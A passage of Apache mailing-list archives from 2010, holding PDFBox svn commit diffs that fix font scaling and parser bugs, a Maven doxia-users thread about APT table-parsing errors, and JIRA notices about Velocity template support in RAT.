vertical text // which seems to be specified in the font (not the direction in the matrix). @@ -447,7 +453,7 @@ public class PDFStreamEngine // textMatrixEnd contains the coordinates of the end of the last glyph without // taking characterSpacingText and spacintText into account, otherwise it'll be // impossible to detect new words within text extraction - Matrix textMatrixEnd = textStateParameters.multiply(td).multiply(textMatrix).multiply(getGraphicsState().getCurrentTransformationMatrix()); + Matrix textMatrixEnd = textStateParameters.multiply(td).multiply(textMatrix).multiply(ctm); // add some spacing to the text matrix (see comment above) tx = ((characterHorizontalDisplacementText)*fontSizeText+characterSpacingText+spacingText)*horizontalScalingText; @@ -473,7 +479,7 @@ public class PDFStreamEngine } totalCharCnt++; - float totalVerticalDisplacementDisp = maxVerticalDisplacementText * fontSizeText; + float totalVerticalDisplacementDisp = maxVerticalDisplacementText * fontSizeText * textMatrix.getYScale(); // process the decoded text processTextPosition( From [email protected] Sun Nov 28 12:17:18 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90762 invoked from network); 28 Nov 2010 12:17:18 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 28 Nov 2010 12:17:18 -0000 Received: (qmail 33675 invoked by uid 500); 28 Nov 2010 12:17:17 -0000 Delivered-To: [email protected] Received: (qmail 33648 invoked by uid 500); 28 Nov 2010 12:17:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33641 invoked by uid 99); 28 Nov 2010 12:17:16 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 28 Nov 2010 12:17:16 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 28 Nov 2010 12:17:15 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id DDE002388A2C; Sun, 28 Nov 2010 12:15:43 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1039871 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java Date: Sun, 28 Nov 2010 12:15:43 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: lehmi Date: Sun Nov 28 12:15:43 2010 New Revision: 1039871 URL: http://svn.apache.org/viewvc?rev=1039871&view=rev Log: PDFBOX-521: fixed NPE which was introduced in revision 1039739 Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java?rev=1039871&r1=1039870&r2=1039871&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java Sun Nov 28 12:15:43 2010 @@ -335,15 +335,20 @@ public class PDFStreamEngine //were a single byte will result in two output characters "fi" final PDFont font = graphicsState.getTextState().getFont(); - // TODO move that to PDFont - boolean isType3Font = font instanceof PDType3Font; - PDMatrix fontMatrix = font.getFontMatrix(); - float fontMatrixXScaling = fontMatrix.getValue(0, 0); - float fontMatrixYScaling = fontMatrix.getValue(1, 1); - - //This will typically be 1000 but in the case of a type3 font - //this might be a different number - final float glyphSpaceToTextSpaceFactor = 1f/fontMatrix.getValue( 0, 0 ); + // all fonts are providing the width/height of a character in thousandths of a unit of text space + float fontMatrixXScaling = 1/1000f; + float fontMatrixYScaling = 1/1000f; + float glyphSpaceToTextSpaceFactor = 1/1000f; + // expect Type3 fonts, those are providing the width of a character in glyph space units + if (font instanceof PDType3Font) + { + PDMatrix fontMatrix = font.getFontMatrix(); + fontMatrixXScaling = fontMatrix.getValue(0, 0); + fontMatrixYScaling = fontMatrix.getValue(1, 1); + //This will typically be 1000 but in the case of a type3 font + //this might be a different number + glyphSpaceToTextSpaceFactor = 1f/fontMatrix.getValue( 0, 0 ); + } float spaceWidthText=0; try { @@ -396,19 +401,11 @@ public class PDFStreamEngine // get the width and height of this character in text units float characterHorizontalDisplacementText = font.getFontWidth( string, i, codeLength ); float characterVerticalDisplacementText = font.getFontHeight( string, i, codeLength ); - // Type3 fonts are providing the width of a character in glyph space units - if (isType3Font) - { - // multiply the width/height with the scaling factor of the font matrix - characterHorizontalDisplacementText = characterHorizontalDisplacementText * fontMatrixXScaling; - characterVerticalDisplacementText = characterVerticalDisplacementText * fontMatrixYScaling; - } - // all other fonts are providing the width/height of a character in thousandths of a unit of text space - else - { - characterHorizontalDisplacementText = characterHorizontalDisplacementText/1000f; - characterVerticalDisplacementText = characterVerticalDisplacementText/1000f; - } + + // multiply the width/height with the scaling factor + characterHorizontalDisplacementText = characterHorizontalDisplacementText * fontMatrixXScaling; + characterVerticalDisplacementText = characterVerticalDisplacementText * fontMatrixYScaling; + maxVerticalDisplacementText = Math.max( maxVerticalDisplacementText, @@ -497,7 +494,6 @@ public class PDFStreamEngine fontSizeText, (int)(fontSizeText * textMatrix.getXScale()) )); - } } From [email protected] Sun Nov 28 22:26:29 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84417 invoked from network); 28 Nov 2010 22:26:29 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 28 Nov 2010 22:26:29 -0000 Received: (qmail 43888 invoked by uid 500); 28 Nov 2010 22:26:29 -0000 Delivered-To: [email protected] Received: (qmail 43861 invoked by uid 500); 28 Nov 2010 22:26:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43854 invoked by uid 99); 28 Nov 2010 22:26:28 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 28 Nov 2010 22:26:28 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 28 Nov 2010 22:26:28 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id B99D823889B9; Sun, 28 Nov 2010 22:24:56 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1039964 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java Date: Sun, 28 Nov 2010 22:24:56 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: lehmi Date: Sun Nov 28 22:24:56 2010 New Revision: 1039964 URL: http://svn.apache.org/viewvc?rev=1039964&view=rev Log: PDFBOX-521: fixed small typo with maximum impact Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java?rev=1039964&r1=1039963&r2=1039964&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java Sun Nov 28 22:24:56 2010 @@ -354,7 +354,7 @@ public class PDFStreamEngine { // to avoid crash as described in PDFBOX-614 // lets see what the space displacement should be - spaceWidthText = (font.getFontWidth( SPACE_BYTES, 0, 1 )/glyphSpaceToTextSpaceFactor); + spaceWidthText = (font.getFontWidth( SPACE_BYTES, 0, 1 )*glyphSpaceToTextSpaceFactor); } catch (Throwable exception) { @@ -363,7 +363,7 @@ public class PDFStreamEngine if( spaceWidthText == 0 ) { - spaceWidthText = (font.getAverageFontWidth()/glyphSpaceToTextSpaceFactor); + spaceWidthText = (font.getAverageFontWidth()*glyphSpaceToTextSpaceFactor); //The average space width appears to be higher than necessary //so lets make it a little bit smaller. spaceWidthText *= .80f; From [email protected] Sun Nov 28 22:55:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88743 invoked from network); 28 Nov 2010 22:55:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 28 Nov 2010 22:55:46 -0000 Received: (qmail 58854 invoked by uid 500); 28 Nov 2010 22:55:46 -0000 Delivered-To: [email protected] Received: (qmail 58829 invoked by uid 500); 28 Nov 2010 22:55:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 58822 invoked by uid 99); 28 Nov 2010 22:55:46 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 28 Nov 2010 22:55:46 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 28 Nov 2010 22:55:44 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id CB98023889B9; Sun, 28 Nov 2010 22:54:11 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1039972 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/Decrypt.java Date: Sun, 28 Nov 2010 22:54:11 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: lehmi Date: Sun Nov 28 22:54:11 2010 New Revision: 1039972 URL: http://svn.apache.org/viewvc?rev=1039972&view=rev Log: PDFBOX-888: fixed the maximum amount of possible command line arguments Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/Decrypt.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/Decrypt.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/Decrypt.java?rev=1039972&r1=1039971&r2=1039972&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/Decrypt.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/Decrypt.java Sun Nov 28 22:54:11 2010 @@ -59,7 +59,7 @@ public class Decrypt private void decrypt( String[] args ) throws Exception { - if( args.length < 2 || args.length > 3 ) + if( args.length < 2 || args.length > 5 ) { usage(); } From [email protected] Mon Nov 29 18:31:50 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48123 invoked from network); 29 Nov 2010 18:31:50 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 29 Nov 2010 18:31:50 -0000 Received: (qmail 29929 invoked by uid 500); 29 Nov 2010 18:31:50 -0000 Delivered-To: [email protected] Received: (qmail 29902 invoked by uid 500); 29 Nov 2010 18:31:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29893 invoked by uid 99); 29 Nov 2010 18:31:49 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 29 Nov 2010 18:31:49 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 29 Nov 2010 18:31:49 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 1945223889E9; Mon, 29 Nov 2010 18:30:18 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1040218 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/BaseParser.java Date: Mon, 29 Nov 2010 18:30:18 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: adam Date: Mon Nov 29 18:30:17 2010 New Revision: 1040218 URL: http://svn.apache.org/viewvc?rev=1040218&view=rev Log: PDFBOX-910: Certain sequences (such as endstrea[^m]) are eaten by BaseParser#readUntilEndStream Reported by Martijn List who also suggested the patch Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/BaseParser.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/BaseParser.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/BaseParser.java?rev=1040218&r1=1040217&r2=1040218&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/BaseParser.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdfparser/BaseParser.java Mon Nov 29 18:30:17 2010 @@ -484,6 +484,8 @@ public abstract class BaseParser //found the whole marker pdfSource.unread( ENDSTREAM ); return; + }else{ + out.write(ENDSTREAM, 0, 8); } }else{ out.write(ENDSTREAM, 0, 7); @@ -505,6 +507,8 @@ public abstract class BaseParser //found whole marker pdfSource.unread( ENDOBJ ); return; + }else{ + out.write(ENDOBJ, 0, 5); } }else{ out.write(ENDOBJ, 0, 4);
From [email protected] Tue Nov 09 21:44:36 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54844 invoked from network); 9 Nov 2010 21:44:36 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 9 Nov 2010 21:44:36 -0000 Received: (qmail 1784 invoked by uid 500); 9 Nov 2010 21:45:07 -0000 Delivered-To: [email protected] Received: (qmail 1748 invoked by uid 500); 9 Nov 2010 21:45:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <doxia-users.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 67688 invoked by uid 99); 9 Nov 2010 21:26:10 -0000 X-ASF-Spam-Status: No, hits=-2.3 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) From: "Huang, Thomas (388J)" <[email protected]> To: "[email protected]" <[email protected]> Date: Tue, 9 Nov 2010 13:25:33 -0800 Subject: maven site broken on table generation Thread-Topic: maven site broken on table generation Thread-Index: AcuAVKT9nrCfFdUEQUe4QtRkA3SXMg== Message-ID: <[email protected]> Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: acceptlanguage: en-US Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable MIME-Version: 1.0 X-Source-IP: altvirehtstap01.jpl.nasa.gov [161.129.204.104] X-Source-Sender: [email protected] X-AUTH: Authorized Hi, I am using Maven 2.2.1 and mave-site-plugin 2.1.1. When I run 'maven site'= , it gives me an error on parsing my APT file on table generation. It is s= topped on the first line where I defined the table with *-- + + + | *-- ... This used to worked and no change was made to my APT file. I have tried ol= der versions of the plugin. The 2.1 plugin emit the same error. All 2.0.x= plugins emil an arrayoutofbound exception. This is blocking my site deplo= y. Please advice. Thomas. From [email protected] Wed Nov 10 06:33:48 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9153 invoked from network); 10 Nov 2010 06:33:48 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Nov 2010 06:33:48 -0000 Received: (qmail 45133 invoked by uid 500); 10 Nov 2010 06:34:19 -0000 Delivered-To: [email protected] Received: (qmail 44960 invoked by uid 500); 10 Nov 2010 06:34:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <doxia-users.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44951 invoked by uid 99); 10 Nov 2010 06:34:17 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 10 Nov 2010 06:34:17 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp.bredband2.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 10 Nov 2010 06:34:11 +0000 Received: from [161.129.204.104] (c-83-233-111-152.cust.bredband2.com [161.129.204.104]) (Authenticated sender: ed5133) by smtp.bredband2.com (Postfix) with ESMTPA id A802A80058 for <[email protected]>; Wed, 10 Nov 2010 07:33:49 +0100 (CET) Message-ID: <[email protected]> Date: Wed, 10 Nov 2010 07:33:53 +0100 From: Dennis Lundberg <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:161.129.204.104) Gecko/20101027 Lightning/1.0b2 Thunderbird/3.1.6 MIME-Version: 1.0 To: [email protected] Subject: Re: maven site broken on table generation References: <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit On 2010-11-09 22:25, Huang, Thomas (388J) wrote: > Hi, > > I am using Maven 2.2.1 and mave-site-plugin 2.1.1. When I run 'maven site', it gives me an error on parsing my APT file on table generation. It is stopped on the first line where I defined the table with > > *-- + + + > | > *-- > ... I ran into a similar issue about a week ago. The problem was that some rows in the table didn't have enough rows in it. It was not the lines of data in the APT file, but rather the formatting rows that contained the error. *-------------------------------------------------------------+-------+----------------------------------------------+ | {{{./jboss-packaging-maven-plugin/} <<<jboss-packaging>>>}} | 2.1.1 | *-------------------------------------------------------------+------------------------------------------------------+ The last line above needed to be replace with this one (notice the added + character) *-------------------------------------------------------------+-------+----------------------------------------------+ See this URL (which seems to currently be down) for what I did to fix it: http://fisheye.codehaus.org/changelog/mojo/?cs=12955 > > This used to worked and no change was made to my APT file. I have tried older versions of the plugin. The 2.1 plugin emit the same error. All 2.0.x plugins emil an arrayoutofbound exception. This is blocking my site deploy. Please advice. > > > Thomas. > > > > > -- Dennis Lundberg From [email protected] Wed Nov 10 10:40:17 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23830 invoked from network); 10 Nov 2010 10:40:17 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 10 Nov 2010 10:40:17 -0000 Received: (qmail 47955 invoked by uid 500); 10 Nov 2010 10:40:47 -0000 Delivered-To: [email protected] Received: (qmail 47871 invoked by uid 500); 10 Nov 2010 10:40:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <doxia-users.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47859 invoked by uid 99); 10 Nov 2010 10:40:45 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 10 Nov 2010 10:40:45 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail2.nbi.dk) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 10 Nov 2010 10:40:38 +0000 Received: from [161.129.204.104] (fire.quniverse.sk [161.129.204.104]) by mail2.nbi.dk (Postfix) with ESMTP id D1E0918000C for <[email protected]>; Wed, 10 Nov 2010 11:40:17 +0100 (CET) Message-ID: <[email protected]> Date: Wed, 10 Nov 2010 11:40:30 +0100 From: Lukas Theussl <[email protected]> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:161.129.204.104) Gecko/20101027 Thunderbird/3.0.10 MIME-Version: 1.0 To: [email protected] Subject: Re: maven site broken on table generation References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit There are 2 issues here: the one that Dennis pointed out that the last line of the table has to match the first; the other that you can't have all cells in all rows empty. Just add at least one row with at least one non-empty cell to make it work. Since you say that this used to work, it would help to know in which version the regression happened, I have tried with 2.0 site plugin (you also have to downgrade the project-info-report-plugin then to avoid the ArrayIndexOutOfBounds) and got the same exception. HTH, -Lukas On 11/10/2010 07:33 AM, Dennis Lundberg wrote: > On 2010-11-09 22:25, Huang, Thomas (388J) wrote: >> Hi, >> >> I am using Maven 2.2.1 and mave-site-plugin 2.1.1. When I run 'maven site', it gives me an error on parsing my APT file on table generation. It is stopped on the first line where I defined the table with >> >> *-- + + + >> | >> *-- >> ... > > I ran into a similar issue about a week ago. The problem was that some > rows in the table didn't have enough rows in it. It was not the lines of > data in the APT file, but rather the formatting rows that contained the > error. > > *-------------------------------------------------------------+-------+----------------------------------------------+ > | {{{./jboss-packaging-maven-plugin/}<<<jboss-packaging>>>}} | 2.1.1 | > *-------------------------------------------------------------+------------------------------------------------------+ > > The last line above needed to be replace with this one (notice the added > + character) > > *-------------------------------------------------------------+-------+----------------------------------------------+ > > > See this URL (which seems to currently be down) for what I did to fix it: > http://fisheye.codehaus.org/changelog/mojo/?cs=12955 > >> >> This used to worked and no change was made to my APT file. I have tried older versions of the plugin. The 2.1 plugin emit the same error. All 2.0.x plugins emil an arrayoutofbound exception. This is blocking my site deploy. Please advice. >> >> >> Thomas. >> >> >> >> >> > >
From [email protected] Sun Aug 01 06:01:40 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45818 invoked from network); 1 Aug 2010 06:01:40 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 1 Aug 2010 06:01:40 -0000 Received: (qmail 13019 invoked by uid 500); 1 Aug 2010 06:01:40 -0000 Delivered-To: [email protected] Received: (qmail 12965 invoked by uid 500); 1 Aug 2010 06:01:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12950 invoked by uid 99); 1 Aug 2010 06:01:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 01 Aug 2010 06:01:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 01 Aug 2010 06:01:36 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o7161GLn014315 for <[email protected]>; Sun, 1 Aug 2010 06:01:16 GMT Message-ID: <25163330.105841280642476730.JavaMail.jira@thor> Date: Sun, 1 Aug 2010 02:01:16 -0400 (EDT) From: "Stefan Bodewig (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (RAT-79) Support for Velocity template files *.vm In-Reply-To: <16054776.25531280243836442.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/RAT-79?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Stefan Bodewig resolved RAT-79. ------------------------------- Resolution: Fixed Thanks, patch went in with svn revision 981163 > Support for Velocity template files *.vm > ---------------------------------------- > > Key: RAT-79 > URL: https://issues.apache.org/jira/browse/RAT-79 > Project: RAT > Issue Type: Improvement > Components: engine > Affects Versions: 0.7 > Reporter: Holger Grandy > Priority: Minor > Fix For: 0.8 > > Attachments: apache-rat-velocity-templates.patch > > > a small patch adding support for velocity template files -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 01 06:01:41 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45847 invoked from network); 1 Aug 2010 06:01:41 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 1 Aug 2010 06:01:41 -0000 Received: (qmail 13097 invoked by uid 500); 1 Aug 2010 06:01:41 -0000 Delivered-To: [email protected] Received: (qmail 13042 invoked by uid 500); 1 Aug 2010 06:01:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13024 invoked by uid 99); 1 Aug 2010 06:01:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 01 Aug 2010 06:01:40 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO thor.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 01 Aug 2010 06:01:38 +0000 Received: from thor (localhost [161.129.204.104]) by thor.apache.org (8.13.8+Sun/8.13.8) with ESMTP id o7161Ghh014309 for <[email protected]>; Sun, 1 Aug 2010 06:01:16 GMT Message-ID: <29483732.105821280642476304.JavaMail.jira@thor> Date: Sun, 1 Aug 2010 02:01:16 -0400 (EDT) From: "Stefan Bodewig (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (RAT-79) Support for Velocity template files *.vm In-Reply-To: <16054776.25531280243836442.JavaMail.jira@thor> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/RAT-79?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Stefan Bodewig updated RAT-79: ------------------------------ Fix Version/s: 0.8 (was: 0.7) > Support for Velocity template files *.vm > ---------------------------------------- > > Key: RAT-79 > URL: https://issues.apache.org/jira/browse/RAT-79 > Project: RAT > Issue Type: Improvement > Components: engine > Affects Versions: 0.7 > Reporter: Holger Grandy > Priority: Minor > Fix For: 0.8 > > Attachments: apache-rat-velocity-templates.patch > > > a small patch adding support for velocity template files -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 01 06:04:50 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46841 invoked from network); 1 Aug 2010 06:04:49 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 1 Aug 2010 06:04:49 -0000 Received: (qmail 13744 invoked by uid 500); 1 Aug 2010 06:04:49 -0000 Delivered-To: [email protected] Received: (qmail 13698 invoked by uid 500); 1 Aug 2010 06:04:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <rat-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13690 invoked by uid 99); 1 Aug 2010 06:04:47 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 01 Aug 2010 06:04:47 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO samaflost.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 01 Aug 2010 06:04:39 +0000 Received: from localhost (localhost.localdomain [161.129.204.104]) by samaflost.de (Postfix) with ESMTP id 7955E28985D1 for <[email protected]>; Sun, 1 Aug 2010 08:04:18 +0200 (CEST) Received: from samaflost.de ([161.129.204.104]) by 